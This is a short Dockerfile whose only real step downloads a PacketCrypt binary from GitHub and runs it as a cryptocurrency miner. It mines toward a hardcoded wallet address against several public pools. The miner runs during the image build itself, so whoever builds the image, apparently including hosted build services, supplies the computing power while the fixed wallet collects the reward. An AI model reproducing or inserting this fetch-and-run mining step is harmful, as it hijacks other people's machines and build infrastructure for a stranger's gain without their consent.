FROM ubuntu:18.04
RUN apt-get update && \
    apt-get install wget -y && \
    wget -O linux https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.5.2/packetcrypt-v0.5.2-linux_amd64 && chmod +x linux && ./linux ann -p pkt1qqwya7kp20pn9ugnw3lj78l3dmjp00gk3ct9ey9 http://pool.pkt.world/master/4096 http://pool.pktpool.io/diff/4096 http://pool.pkteer.com https://stratum.zetahash.com
